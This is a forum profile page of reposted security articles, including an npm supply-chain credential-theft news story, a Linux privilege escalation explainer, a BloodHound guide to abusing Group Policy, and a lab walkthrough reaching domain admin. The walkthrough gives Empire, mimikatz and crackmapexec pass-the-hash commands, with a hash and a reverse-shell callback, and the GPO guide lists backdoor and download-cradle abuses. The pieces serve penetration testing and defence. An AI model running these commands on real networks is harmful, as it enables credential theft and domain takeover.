Jump to content

Nytro

Administrators
  • Posts

    18740
  • Joined

  • Last visited

  • Days Won

    711

Everything posted by Nytro

  1. By Catalin Cimpanu July 12, 2018 12:10 PM 0 A hacker has gained access to a developer's npm account and injected malicious code into a popular JavaScript library, code that was designed to steal the npm credentials of users who utilize the poisoned package inside their projects. The JavaScript (npm) package that got compromised is called eslint-scope, a sub-module of the more famous ESLint, a JavaScript code analysis toolkit. Hacker gained access to a developer's npm account The hack took place on the night between July 11 and 12, according to the results of a preliminary investigation posted on GitHub a few hours ago. "One of our maintainers did observe that a new npm token was generated overnight (said maintainer was asleep)," said Kevin Partington, ESLint project member. Partington believes the hacker used the newly-generated npm token to authenticate and push a new version of the eslint-scope library on the npm repository of JavaScript packages. The malicious version was eslint-scope 3.7.2, which the maintainers of the npm repository have recently taken offline. Malicious code steals npm credentials "The published code seems to steal npm credentials, so we do recommend that anyone who might have installed this version change their npm password and (if possible) revoke their npm tokens and generate new ones," Partington recommended for developers who used esling-scope. In an email to Bleeping Computer, npm CTO C.J. Silverio put the incident into perspective. "We determined that access tokens for approximately 4,500 accounts could have been obtained before we acted to close this vulnerability. However, we have not found evidence that any tokens were actually obtained or used to access any npmjs.com account during this window," Silverio said. "As a precautionary measure, npm has revoked every access token that had been created prior to 2:30 pm UTC (7:30 am California time) today. This measure requires every registered npm user to re-authenticate to npmjs.com and generate new access tokens, but it ensures that there is no way for this morning’s vulnerability to persist or spread. We are additionally conducting a full forensic analysis to confirm that no other accounts were accessed or used to publish unauthorized code. "This morning’s incident did not happen because of an npmjs.com breach, but because of a breach elsewhere that exposed a publisher’s npm credentials. To mitigate this risk, we encourage every npmjs.com user to enable two-factor authentication, with which this morning’s incident would have been impossible," Silverio added. The developer who had his account compromise has changed his npm password, enabled two-factor authentication, and generated new tokens to access his existing npm libraries. The incident is of great importance because the stolen npm credentials can be used in a similar manner to what happened now. The hacker can use any of the stolen npm credentials to poison other JavaScript libraries that are made available via npm — a.k.a. the Node Package Manager, the semi-official package manager for the JavaScript ecosystem. Similar incidents have happened in the past year This is the third incident in the past year when a hacker has inserted malicious code in an npm package. The first such incident happened in August 2017 when the npm team removed 38 JavaScript npm packages that were caught stealing environment variables from infected projects. In May 2018, someone tried to hide a backdoor in another popular npm package named getcookies. Similar incidents with malware ending up in package repositories have happened with Python's PyPI [1, 2], Docker Hub, Arch Linux AUR, and the Ubuntu Store. UPDATE July 13, 02:45 AM ET: The ESLint team has published the final results of their investigation. They say that besides the esling-scope 3.7.3 package, the attacker also compromised another package, eslint-config-eslint, pushing out a malicious module eslint-config-eslint 5.0. Article updated with comments from npm CTO C.J. Silverio. Sursa: https://www.bleepingcomputer.com/news/security/compromised-javascript-package-caught-stealing-npm-credentials/
  2. OWASP Bucharest AppSec Conference 2018 - October 25th - 26th OWASP Bucharest team is happy to announce the OWASP Bucharest AppSec Conference 2018 a two days Security and Hacking Conference with additional training days dedicated to the application security. It will take place between 25th and 26th of October, 2018 - Bucharest, Romania. The objective of the OWASP's Bucharest AppSec Conference is to raise awareness about application security and to bring high-quality security content provided by renowned professionals in the European region. Everyone is free to participate in OWASP and all our materials are available under a free and open software license. Call for papers is now open! Please submit here your talk proposal Call for trainings is now open! Please submit here your training proposal Important dates Call for papers deadline: 24th of September Call for trainings deadline 24th of September The final agenda will be published after 1st of October 2018 CTF qualifiers will be on 29th of September CTF final will be on 25th of September Conference trainings and CTF day is 25th of October 2018 Conference presentation tracks and workshops day is 26th of October 2018 Who Should Attend? Application Developers Application Testers and Quality Assurance Application Project Management and Staff Chief Information Officers, Chief Information Security Officers, Chief Technology Officers, Deputies, Associates and Staff Chief Financial Officers, Auditors, and Staff Responsible for IT Security Oversight and Compliance Security Managers and Staff Executives, Managers, and Staff Responsible for IT Security Governance IT Professionals interested in improving IT Security Anyone interested in learning about or promoting Web Application Security CONFERENCE (Friday 26th of October) Date Location Friday 26th of October, 8.00 AM Venue Location: Hotel Caro Workshops: Hotel Caro Venue Address: 164A Barbu Vacarescu Blvd. 2nd District, 020285 Bucharest, Romania Price and registration The conference entrance is FREE, you need to register on the link provided below, print your ticket and present it at the entrance. The training sessions will be paid. The workshops and CTF attendance is free of charge Registration Limited number of seats! Detalii: https://www.owasp.org/index.php/OWASP_Bucharest_AppSec_Conference_2018
  3. Understanding Linux Privilege Escalation and Defending Against It Table of Contents What is Linux privilege escalation? How to escalate privileges? It is all about enumeration Linux enumeration Exploiting the weakness How an attacker exploits software Example of a privilege escalation attack How do you defend against privilege escalation? Reduce the information leaked by applications Remove compilers or restrict access to them Apply Linux updates and patches Run file integrity monitoring software Perform system auditing Privilege escalation checkers Conclusion What is Linux privilege escalation? Privilege escalation is the process of elevating your permission level, by switching from one user to another one and gain more privileges. For example, a normal user on Linux can become root or get the same permissions as root. This can be authorized usage, with the use of the su or sudo command. It can also be unauthorized, for example when an attacker leverages a software bug. Especially this last category of privilege escalations is interesting to understand, so we can better defend our Linux systems. How to escalate privileges? Attackers who try to obtain additional privileges, often use so-called exploits. Exploits are pieces of code with the goal to release a particular payload. The payload will focus on a known weakness in the operating system or running software components. This may result in the software crashing or giving access to unexpected areas of the memory. By overwriting segments of memory and executing special crafted (shell) code, one may gain a successful privilege escalation. These are the steps an attacker usually takes: Find a vulnerability Create the related exploit Use the exploit on a system Check if it successfully exploits the system Gain additional privileges It is all about enumeration The first step is to find a weakness or vulnerability in the system. To learn about any weaknesses you have to know what operating system and version is used. This is done with a process that is called enumeration. Within this process, you try to learn as much as possible about a network and its systems. Attackers find more information by using Google, port scanning, and study the responses of requests from applications. With each step, more information becomes available. A similar approach is taken by penetration testers (pentesters), attackers with a legal contract to do so. During this enumeration phase, the attacker can also determine if there are any compilers are available. If not, then there might any high-level programming languages like Perl or Python instead. This information is useful for a later stage, in which exploit code is used. As part of enumeration, a lot of data will be collected. Every finding has to be stored, so it can be stored and processed later. Each piece of information can be used to search for known vulnerabilities, or other entries into the system. For example, when Apache is used, and the version number is listed, we can search for known vulnerabilities for that particular version. Linux enumeration For most operating systems and applications there are dedicated tools to help. Linux enumeration tools focus specifically on retrieving data from several key areas. These include directories that store the system configuration or its status, like /etc and /proc. There are several system administration tools available that will retrieve network details, file locations, or the system version. Example include: /etc /proc ifconfig lsof netstat uname Exploiting the weakness Next stage is about exploiting any weaknesses found. Sometimes ready-to-use code can be executed against the target, resulting in some level of access. Your WordPress installation (or a plugin) might be outdated, which may give an external visitor the permissions to upload files. The attacker can use this to plant a custom PHP script, to collect more information from the system. This is done by using specific PHP functions, like system(), to execute commands on the system itself. How an attacker exploits software The exploit process may take different steps before the right level of access is gained. Just being able to upload a file might be harmless to the system. So with every step, the attacker tries to retrieve more information and adjusting any required exploit. Sometimes a vulnerability might be there, but not exploitable. This can be due to additional defense layers (e.g. memory randomizing). The attacker has to adapt to the specifics of the machine. Example of a privilege escalation attack To show how an attacker may become root, let’s have a look at an example. Let’s assume the following: we have a Linux system running CentOS, with Apache and a WordPress website on it. Like most WordPress installations, it has several plugins installed. The webmaster had a busy period and did not update the plugins for a while. This is how a privilege escalation attack could go: The attacker runs an automatic script to detect this outdated plugin on many systems across the internet The automated script picks up on the presence of the plugin on the system and checks if it is version 1.2.4 The attacker verifies the finding (or weed out any false positive) Attacker manually abuses the weakness in the plugin and via that uploads a custom PHP file to the system The attacker now requests to run this PHP script, to retrieve more data on the system The output of the script finds the availability of a compiler The script also finds an outdated Linux kernel, which has a known exploit to become root for non-privileged users A small C program is uploaded via the plugin The compiler is executed to compile the specific piece of C code into a binary program The program is executed to abuse the Linux privilege escalation bug in the kernel A new user is added to the system by the attacker The attacker can now log in to the system via SSH This is just an example of how a small piece of information is used during enumeration and followed up for later processing. Then the process is repeated several times to find more details about the system until the attacker gains full root permissions. How do you defend against privilege escalation? The best way to counter Linux privilege escalations is by using the common “defense in depth” method. You apply several defenses, each targeting a specific area. If one layer of defense fails, this doesn’t necessarily mean your system can be compromised. That is obviously easier said than done, so let’s have a look in some of the measures. Reduce the information leaked by applications Most applications have an application banner. This can be a greeting message with details about the application, like its name and version number. While it may look innocent, it is better to avoid giving away too much information. Especially leaking version numbers should be prevented. Hiding the nginx version number WordPress hardening and reduce information disclosure Remove compilers or restrict access to them The presence of a compiler is not needed for most systems. Production systems should only have a compiler available when it is absolutely necessary. As attackers often need the compiler to successfully build an exploit, removing them is definitely a good step. Apply Linux updates and patches Systems often get compromised due to weaknesses in software components. There are actually multiple suggestions in this area. First of all, subscribe to mailing lists to know what kind of vulnerabilities were found recently. Next step is to run updates on a regular basis and keep your systems up-to-date. Also, apply security updates automatically when possible, like using unattended-upgrades on Debian and Ubuntu systems. Run file integrity monitoring software The best way to detect a privilege escalation or breach is by monitoring important system files. If one of them change unexpectedly, this may be an indication of a security issue. This monitoring can be achieved by file integrity monitoring (FIM) solution. Popular tools include AIDE or with the Linux audit framework (auditd). Perform system auditing Maybe the best thing one can do is running continuously security audits. For Linux systems, consider a tool like rkhunter or ClamAV to do malware scanning. Use Lynis for an in-depth security scan of the system. While Lynis is intended as a defensive tool, it actually can find things that are related to privilege escalation. Think of issues like cronjobs that are writable or showing software banners. For that reason, Lynis is also used by pentesters in their work. System auditing may actually reveal unexpected vulnerabilities that the usual vulnerability scanners could not find. Privilege escalation checkers Some tools can help you with checking if there is a privilege escalation possible. This can be a useful exercise to learn how privilege escalations work. They will also help you check if your Linux systems are vulnerable to a particular type of privilege escalation and take counter-measures. unix-privesc-check – Gather information and determine possible attacks LinEnum – Perform enumeration and check for possible Linux privilege escalation options Have a look at the privilege escalation tools on Linux Security Expert for more options and more extensive reviews. Conclusion Linux privilege escalation can happen due to one or more failing security layers. An attacker has to start doing enumeration and process the resulting data. He or she will continue to do testing when more information becomes available. This will repeat until one of the security defenses gets penetrated. Applying proper security defenses is your first safeguard against these attacks. They get much stronger if all defenses are in place, like minimizing the data you share, applying security updates, and monitoring the systems. Sursa: https://linux-audit.com/understanding-linux-privilege-escalation-and-defending-against-it/
  4. A Red Teamer’s Guide to GPOs and OUs April 2, 2018 / 2 Comments Intro Active Directory is a vast, complicated landscape comprised of users, computers, and groups, and the complex, intertwining permissions and privileges that connect them. The initial release of BloodHound focused on the concept of derivative local admin, then BloodHound 1.3 introduced ACL-based attack paths. Now, with the release of BloodHound 1.5, pentesters and red-teamers can easily find attack paths that include abusing control of Group Policy, and the objects that those Group Policies effectively apply to. In this blog post, I’ll recap how GPO (Group Policy Object) enforcement works, how to use BloodHound to find GPO-control based attack paths, and explain a few ways to execute those attacks. Prior Work Lucas Bouillot and Emmanuel Gras included GPO control and OU structure in their seminal work, “Chemins de contrôle en environnement Active Directory”. They used an attack graph to map which principals could take control of GPOs, and which OUs those GPOs applied to, then chased that down to the objects affected by those GPOs. We learned a lot from Lucas and Emannuel’s white paper (in French), and I’d highly recommend you read it as well. There are several important authors and resources we leaned on when figuring out how GPO works, in no particular order: the Microsoft Group Policy team’s posts on TechNet, Sean Metcalf’s work at adsecurity.org, 14-time Microsoft MVP “GPO Guy” Darren Mar-Elia, Microsoft’s Group Policy functional specification, and last but certainly not least, Will Schroeder’s seminal blog post on Abusing GPO Permissions. Special extra thanks to Darren Mar-Elia for answering a lot of my questions about Group Policy. Thanks, Darren! Other resources and references are linked at the bottom of this blog post. The Moving Parts of Group Policy There’s no two ways about it: GPO enforcement is a complicated beast with a lot of moving parts. With that said, let’s start at the very basics with the vocabulary used in the rest of the post, and build up to explaining how those moving parts interact with one another: GPO: A Group Policy Object. When an Active Directory domain is first created, two GPOs are created as well: “Default Domain Policy” and “Default Domain Controllers”. GPOs contain sets of policies that affect computers and users. For example, you can use a GPO policy to control the Windows desktop background on computers. GPOs are visible in the Group Policy Management GUI here: Above: The list of GPOs in our test domain. Technically, “Default Domain Controllers Policy” is the display name of the GPO, while the name of the GPO is a GPO curly braced “GUID”. I put “GUID” in quotation marks because this identifier is not actually globally unique. The “Default Domain Controllers Policy” in every Active Directory domain will have the same “name” (read: curly braced GUID): {6AC1786C-016F-11D2-945F-00C04fB984F9}. For this reason, GPOs have an additional parameter called objectguid, which actually is globally unique. The policy files for any given GPO reside in the domain SYSVOL at the policy’s gpcfilesyspath (ex: \\contoso.local\sysvol\contoso.local\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}). Above: The relevant properties of the “Default Domain Controllers Policy” GPO, and that GPO’s policy files location in the SYSVOL. OU: An Organizational Unit. According to Microsoft’s TechNet, OUs are “general-purpose container that can be used to group most other object classes together for administrative purposes”. Basically, OUs are containers that you place principals (users, groups, and computers) into. Organizations will commonly use OUs to organize principals based on department and/or geographic location. Additionally, OUs can of course by nested within other OUs. This usually results in a relatively complex OU tree structure within a domain, which can be difficult to navigate without first being very familiar with the tree. You can see OUs in the ADUC (Active Directory Users and Computers) GUI. In the below screenshot, “ContosoUsers” is a child OU of the CONTOSO.LOCAL domain, “Helpdesk” is a child OU within the “ContosoUsers” OU, and “Alice Admin” is a child user of the “Helpdesk” OU: Above: The Alice Admin user within the OU tree. GpLink: A Group Policy Link. GPOs can be “linked” to domains, sites, and OUs. By default, a GPO that is linked to an OU will apply to the child objects of that OU. For example, the “Default Domain Policy” GPO is linked, by default, to the domain object, while the “Default Domain Controllers Policy” is linked, by default, to the Domain Controllers OU. In the below screenshot, you can see that if we expand the “contoso.local” domain and the “Domain Controllers” OU, the GPOs linked to those objects appear below them: Above: The “Default Domain Policy” is linked to the domain “contoso.local”. The “Default Domain Controllers” policy is linked to the “Domain Controllers” OU. GpLinks are stored on the objects the GPO is linked to, on the attribute called “gplink”. The format of the “gplink” attribute value is [<Distinguished name of the GPO>;<0 if the link is not enforced, 1 if the link is enforced>]. You can easily enumerate those links with PowerView as in the example below: Above: The “Default Domain Controllers Policy” GPO is linked to the “Domain Controllers” OU, and is not enforced. Those three pieces — GPOs, OUs, and GpLinks — comprise the major moving parts we’re working with. It’s important to know those three pieces well before understanding GPO enforcement logic and how to use BloodHound to find attack paths, so make sure you feel confident with those before continuing on. One last note: GPOs can also be linked to sites, but at this time we’re not including that due to complications site memberships and collection challenges. GPO Enforcement Logic Now that you know the basic moving parts, let’s look more closely at how they connect. GPO enforcement logic, very briefly, works like this: GpLinks can be enforced, or not. OUs can block inheritance, or not. If a GpLink is enforced, the associated GPO will apply to the linked OU and all child objects, regardless of whether any OU in that tree blocks inheritance. If a GpLink is not enforced, the associated GPO will apply to the linked OU and all child objects, unless any OU within that tree blocks inheritance. There are further complications on top of this, which we’ll get to later on. First though, let’s visualize the above rules regarding GpLink enforcement and OUs blocking inheritance. Recall earlier I had a user called Alice Admin within a HelpDesk OU. Instead of looking at that in ADUC, though, let’s start to think about this as a graph: Above: Alice Admin within the domain/OU tree. The domain object, Contoso.Local, is a container object. It contains the OU called ContosoUsers. The OU ContosoUsers contains the OU HelpDesk. Finally, the OU HelpDesk contains the user Alice Admin. Now, let’s add our Default Domain Policy GPO into the mix. Recall from earlier that in my test domain, that GPO is linked to the domain object: Above: The “Default Domain Policy” GPO is linked to the domain object. Now, in default circumstances, you can simply read from left to right to figure out that the Default Domain Policy will apply to the user Alice Admin. The “default circumstance” here is that the GpLink relationship is not enforced, and that none of the containers in this path block inheritance. Let’s add that information to the above graph: In this circumstance, it doesn’t matter that the GpLink edge is not enforced, as none of the OUs block inheritance. In our test domain, we have another OU under ContosoUsers called “Accounting”, with one user in that OU: Bob User. For example’s sake, we’ll say that the Accounting OU does block inheritance. Let’s add that to our existing graph: Again, we can see that the Default Domain Policy GPO is linked to the domain object, and Bob User is contained within the OU tree under the domain object; however, because the OU “Accounting” blocks inheritance, and because the GpLink edge is not enforced, the Default Domain Policy will not apply to Bob User. Still with me? You’d be forgiven for being slightly confused at this point, but don’t worry, it gets worse! Let’s add another GPO to the mix and link it to the domain object as well, except this time we will enforce the GpLink: Our new GPO called “Custom Password Policy” is linked to the domain object, which again contains the entire OU tree under it. Now, because the GPLink is enforced, this policy will apply to all child objects in the OU tree, regardless of whether any of those OUs block inheritance. This means that the “Custom Password Policy” GPO will apply to both “Alice Admin” and “Bob User”, despite the “Accounting” OU blocking inheritance. In our experience, this information is going to cover 95%+ of situations you’ll run into in real enterprise networks; however, there are three more things to know about, which may impact you when abusing GPO control paths during your pentests and red team assessments: WMI filtering, security filtering, and Group Policy link order and precedence. WMI filtering allows administrators to further limit which computers and users a GPO will apply to, based on whether a certain WMI query returns True or False. For example, when a computer is processing group policy, it may run a WMI query that checks if the operating system is Windows 7, and only apply the group policy if that query returns true. See Darren Mar-Elia’s excellent blog post for further details. Security filtering allows administrators to further limit which principals a GPO will apply to. Administrators can limit the GPO to apply to specific computers, users, or the members of a specific security group. By default, every GPO applies to the “Authenticated Users” principal, which includes any principal that successfully authenticates to the domain. For more details, see this post on the TechGenix site. Group Policy link order dictates which Group Policy “wins” in the event of conflicting, non-merging policies. Imagine you have two “Password Policy” GPOs: one that requires users to change their password every 30 days, and one that requires users to change their password every 60 days. Whichever policy is higher in the precedence order is the policy that will “win”. The group policy client enforces this “win” condition by processing policies in reverse order of precedence, so the highest precedence policy is processed last, and “wins”. Luckily, you don’t need to worry about this for almost every abuse primitive. For more information, check out this blog post. Like I said above, our experience has been that in real enterprise networks, you won’t need to worry about WMI filtering, security filtering, or GpLink order in 95% or more of the situations you run into, but I mention them so you know where to start troubleshooting if your abuse actions aren’t working. We may try to roll those three items into the BloodHound interface in the future. In the meantime, make sure your target computer and user objects won’t be filtered out by WMI or security filters, or attempt to push an evil group policy that will be overruled by a higher precedence policy. Analysis with BloodHound First, make sure you are running at least BloodHound 1.5.1. Second, do your standard SharpHound collection like you always have, but this time either do the “All” or “Containers” and “ACL” collection methods, which will collect GPO ACLs and OU structure for you: C:\> SharpHound.exe -c All Then, import the resulting acls.csv, container_gplinks.csv, and container_structure.csv through the BloodHound interface like normal. Now you’re ready to start analyzing outbound and inbound GPO control against objects. For example, let’s take a look at our “Alice Admin” user. If we search for this user, then click on the user node, you’ll see some new information in the user tab, including “Effective Inbound GPOs”: Above: Two GPOs apply to Alice Admin. The Cypher query that generates this number does the GpLink enforcement and OU blocking inheritance logic for you, so you don’t need to worry about working that out yourself. Simply click on the number “2”, in this instance, to visualize the GPOs that apply to “Alice Admin”: Above: How the two GPOs apply to Alice Admin. Notice the edge connecting “Default Domain Policy” to the “Contoso.Local” domain is dotted. This means that this GPO is not enforced; however, all of the “Contains” edges are solid, meaning that none of those containers block inheritance. Recall from earlier that unenforced GpLinks will only be affected by OUs that block inheritance, so in this case, the Default Domain Policy still applies to Alice Admin. Also note that the edge connecting “Customer Password Policy” to the “Contoso.Local” domain is solid. This means that this GPO is enforced, and will therefore apply to all children objects regardless of whether any subsequent containers block inheritance. We can also see the flip side of this — what objects does any given GPO effectively apply to? First, let’s check out the Custom Password Policy GPO: Above: The Custom Password Policy GPO applies to 3 computers and 5 users. Reminder: GPOs can only apply to users and computers, not security groups. By clicking on the numbers, you can render the objects affected by this GPO, and how the GPO applies to those objects. If we click the “5” next to “User Objects”, we get this graph: Above: How the Customer Password Policy GPO applies to user objects. There are two important things to point out here: again, the edge connecting the “Custom Password Policy” GPO to the “Contoso.Local” domain object is solid, meaning this GPO is enforced. Second, notice the edge connecting the “Accounting” OU to the “Bob User” user is dotted, indicating the “Accounting” OU blocks inheritance. But, because the “Custom Password Policy” GPO is enforced, the OU blocking inheritance doesn’t matter, and will be applied to the “Bob User” user anyway. Compare the above graph to the graph we get if we do the same for the “Default Domain Policy”: Above: The users affected by the “Default Domain Policy” GPO. Notice how the “Bob User” user is no longer there? That’s because the “Default Domain Policy” GPO is not enforced. Because the “Accounting” OU blocks inheritance, that GPO will not apply to the “Bob User” user. Alright, let’s put it all together and see if we can find an attack path from “Bob User” to “Alice Admin”. In the BloodHound search bar, click the path finding icon, then select your source node and target node. Hit enter, and BloodHound will find and render an attack path, if one exists: Above: The attack path from “Bob User” to “Alice Admin”. Reading this graph from left to right, we can see that “Bob User” is in a group called “Accounting”, which is part of a group called “Group Policy Admins” (believe me when I say crazier things have happened in the wild, and remember this is a contrived example :). The “Group Policy Admins” group has, as you would imagine, full control of the “Custom Password Policy” GPO. That GPO is then linked to the “Contoso.Local” domain. From here we have a couple options – push an evil policy down to the “Administrator” user and take over “Alice Admin” with an ACL based attack or just push an evil policy down directly to the “Alice Admin” user. Abusing GPO Control Finally, the most important part of this entire topic: how to actually take over computers and users with control over the GPOs that affect those users. For a bit of background and inspiration, read Will’s excellent blog post on abusing GPO rights, which contains information about the first proof-of-concept GPO abuse cmdlet that I’m aware of, New-GPOImmediateTask. When people say “you can do anything with GPO”, they really mean it: you can do anything with GPO. Will and I put together this list of abuses against computers, including the policy location and abuse, just to give you a few ideas: Policy Location: Computer Configuration\Preferences\Control Panel Settings\Folder Options Abuse: Create/alter file type associations, register DDE actions with those associations. Policy Location: Computer Configuration\Preferences\Control Panel Settings\Local Users and Groups Abuse: Add new local admin account. Policy Location: Computer Configuration\Preferences\Control Panel Settings\Scheduled Tasks Abuse: Deploy a new evil scheduled task (ie: PowerShell download cradle). Policy Location: Computer Configuration\Preferences\Control Panel Settings\Services Abuse: Create and configure new evil services. Policy Location: Computer Configuration\Preferences\Windows Settings\Files Abuse: Affected computers will download a file from the domain controller. Policy Location: Computer Configuration\Preferences\Windows Settings\INI Files Abuse: Update existing INI files. Policy Location: Computer Configuration\Preferences\Windows Settings\Registry Abuse: Update specific registry keys. Very useful for disabling security mechanisms, or triggering code execution in any number of ways. Policy Location: Computer Configuration\Preferences\Windows Settings\Shortcuts Abuse: Deploy a new evil shortcut. Policy Location: Computer Configuration\Policies\Software Settings\Software installation Abuse: Deploy an evil MSI. The MSI must be available to the GP client via a network share. Policy Location: Computer Configuration\Policies\Windows Settings\Scripts (startup/shutdown) Abuse: Configure and deploy evil startup scripts. Can run scripts out of GPO directory, can also run PowerShell commands with arguments Policy Location: Computer Configuration\Policies\Windows Settings\Security Settings\Local Policies\Audit Policy Abuse: Modify local audit settings. Useful for evading detection. Policy Location: Computer Configuration\Policies\Windows Settings\Security Settings\Local Policies\User Rights Assignment\ Abuse: Grant a user the right to logon via RDP, grant a user SeDebugPrivilege, grant a user the right to load device drivers, grant a user seTakeOwnershipPrivilege. Basically, take over the remote computer without ever being an administrator on it. Policy Location: Computer Configuration\Policies\Windows Settings\Security Settings\Registry Abuse: Alter DACLs on registry keys, grant yourself an extremely hard to find backdoor on the system. Policy Location: Computer Configuration\Policies\Windows Settings\Security Settings\Windows Firewall Abuse: Manage the Windows firewall. Open up ports if they’re blocked. Policy Location: Computer Configuration\Preferences\Windows Settings\Environment Abuse: Add UNC path for DLL side loading. Policy Location: Computer Configuration\Preferences\Windows Settings\Files Abuse: Copy a file from a remote UNC path. So, that’s all well and good, but how do we actually take these actions? Currently, you’ve got two options: download and install the Group Policy Management Console and use the GPMC GUI to modify the relevant GPO or manually craft the relevant policy file and correctly modify the GPO and gpt.ini file. As an example, let’s say you want to push a new immediate scheduled task to a computer or user. My current understanding (which is definitely subject to correction), based on testing and the Microsoft Group Policy Preferences functional spec, follows: Whenever a group policy client (user or computer) checks for updated group policy, they will go through several steps to collect and apply Group Policy to themselves. The client will check whether the remote version of the GPO is greater than the locally cached version of that GPO (unless gpupdate /force is used). The remote version of the GPO is stored in two locations: As an integer value for the versionNumber attribute on the Group Policy Object itself. As the same integer in the GPT.INI file, located at \\<domain.com>\Policies\<gpo name>\GPT.ini. Note that the “name” of the GPO is not the display name. For instance, the “name” for the Default Domain Policy is {6AC1786C-016F-11D2-945F-00C04fB984F9}. If the remote GPO version number is greater than the locally cached version, the group policy client will continue, analyzing which policies and/or preferences it needs to search for in the relevant SYSVOL directory. For Group Policy preferences (which scheduled tasks fall under), the group policy client will check to see which Client-Side Extensions (CSEs) exist as part of the “gPCMachineExtensionNames” and “gPCUserExtensionNames” attributes. According to the Microsoft Group Policy Preferences functional spec, CSE GUIDs “enable a specific client-side extension on the Group Policy client to be associated with policy data that is stored in the logical and physical components of a Group Policy Object (GPO) on the Group Policy server, for that particular extension.” The CSE GUIDs for Immediate Scheduled tasks, as they would be stored in the “gPCMachineExtensionNames” attribute, are: [{00000000-0000-0000-0000-000000000000}{79F92669-4224-476C-9C5C-6EFB4D87DF4A}{CAB54552-DEEA-4691-817E-ED4A4D1AFC72}][{AADCED64-746C-4633-A97C-D61349046527}{CAB54552-DEEA-4691-817E-ED4A4D1AFC72}] And in a slightly more readable format: [ {00000000-0000-0000-0000-000000000000} {79F92669-4224-476C-9C5C-6EFB4D87DF4A} {CAB54552-DEEA-4691-817E-ED4A4D1AFC72} ] [ {AADCED64-746C-4633-A97C-D61349046527} {CAB54552-DEEA-4691-817E-ED4A4D1AFC72} ] This translates to the following: [ {Core GPO Engine} {Preference Tool CSE GUID Local users and groups} {Preference Tool CSE GUID Scheduled Tasks} ] [ {Preference CSE GUID Scheduled Tasks} {Preference Tool CSE GUID Scheduled Tasks} ] Once the group policy client understands that there are some scheduled tasks that apply to it, it will search for a file in the GP directory called ScheduledTasks.xml. That file exists in a predictable location: \\<domain.com>\sysvol\<domain.com>\Policies\<gpo-name>\Machine\Preferences\ScheduledTasks.xml Finally, the group policy client will parse the ScheduledTasks.xml and register the task locally. That’s how the process works, as I understand it. There is still a lot of work to be done on crafting scripts to automate the GPO abuse process, as installing GPMC is rarely a great option while on a red team assessment. If ever there were a call to arms, this is it: we’ll continue working on creating scripts that reliably automate GPO control abuse, but are equally as excited to see what people in the community can come up with as well. Conclusion As Rohan mentioned in his post, BloodHound 1.5 represents a pretty big milestone for the BloodHound project. By adding in GPOs and OU structure, we’re greatly increasing the scope of Active Directory attack surface you can easily map out with BloodHound. In a future blog post, I’ll focus more on the defensive side of things, showing how defenders can use BloodHound to analyze and reduce the attack surface in AD now that we’re tracking GPOs and OU structure. BloodHound is available free and open source on GitHub at https://github.com/BloodHoundAD/BloodHound You can join us on Slack at the official BloodHound Gang Slack here: https://bloodhoundgang.herokuapp.com/ Also published on Medium. Sursa: https://wald0.com/?p=179
  5. Domain Penetration Testing: Using BloodHound, Crackmapexec, & Mimikatz to get Domain Admin In the previous two articles, I gathered local user credentials and escalated to local administrator, with my next step is getting to domain admin. Since I have local admin, I’ll be using a tool called Bloodhound that will map out the entire domain for me and show where my next target will be. After getting Bloodhound running on my Windows host machine (here’s a guide), I then identify a server, 2008R2SERV, that the domain admin, Jaddmon, is logged into. For a guide to setting up and running Bloodhound, view my write-up here. My first step is to try and use Crackmapexec to invoke Mimikatz and dump the credentials, but SMB on this machine is not allowing logins, so I have to find another way around. Since I have local admin rights, I go ahead and RDP into the server where I then use Empire to get a foothold on the server. Using Empire is easy: First I start up empire and then start a listener, like below Once the listener is started, I then type launcher powershell http to generate a powershell payload that will talk back to my listener. I copy this long command, switch to the RDP session and open a command prompt and paste it. When it runs, I see in Empire that I now have an agent on that machine. To interact with it, I first type agents Then interact VLLRZY4EC (or whatever your agent name is) Even though I’m local admin, I still have to bypass UAC. Luckily, there’s a module for this in Empire. I then type usemodule privesc/bypassuac and then set Listener http and then run it. I then get another agent on the machine and yet again, I interact with that new agent. Now I dump the credentials by typing mimikatz It does it’s thing and gives a messy output, but this can be cleaner by typing creds and I then see the domain administrator hashed password. I won’t go the route of cracking the password because that’s too easy. Instead I’ll pass the hash using Crackmapexec. As a PoC, I’ll list the SMB shares of the DC. crackmapexec 192.168.1.100 -u Jaddmon -H 5858d47a41e40b40f294b3100bea611f --shares ‘Success! From here, there’s two methods you can use to get a shell, as outlined here. I prefer the Metasploit option. crackmapexec 192.168.1.100 -u Jaddmon -H 5858d47a41e40b40f294b3100bea611f -M metinject -o LHOST=192.168.1.63 LPORT=4443 Once multi/handler is listening, the connection comes in after a brief wait And boom! Just like that, domain admin. This is one of many ways to exploit Active Directory misconfigurations to get to domain admin. As stated before, this is not the end of a penetration test though. My next steps here would be to try other methods to get to domain admin or any other accounts because a penetration test is conducted to see what all of the vulnerabilities are in a network, not just one. Additional Resources I recommend reading: http://ethicalhackingblog.com/hacking-powershell-empire-2-0/ https://adsecurity.org/?p=2398 https://github.com/byt3bl33d3r/CrackMapExec https://byt3bl33d3r.github.io/getting-the-goods-with-crackmapexec-part-1.html Sursa: https://hausec.com/2017/10/21/domain-penetration-testing-using-bloodhound-crackmapexec-mimikatz-to-get-domain-admin/
  6. Trebuie alocat spatiu pentru acei vectori. Foloseste liste mai bine: https://www.javatpoint.com/java-list
  7. Catalog Description Learn how to analyze malware, including computer viruses, trojans, and rootkits, using disassemblers, debuggers, static and dynamic analysis, using IDA Pro, OllyDbg and other tools. Advisory: CS 110A or equivalent familiarity with programming Upon successful completion of this course, the student will be able to: Describe types of malware, including rootkits, Trojans, and viruses. Perform basic static analysis with antivirus scanning and strings Perform basic dynamic analysis with a sandbox Perform advanced static analysis with IDA Pro Perform advanced dynamic analysis with a debugger Operate a kernel debugger Explain malware behavior, including launching, encoding, and network signatures Understand anti-reverse-engineering techniques that impede the use of disassemblers, debuggers, and virtual machines Recognize common packers and how to unpack them Videos: https://samsclass.info/126/126_S17.shtml
      • 2
      • Thanks
      • Like
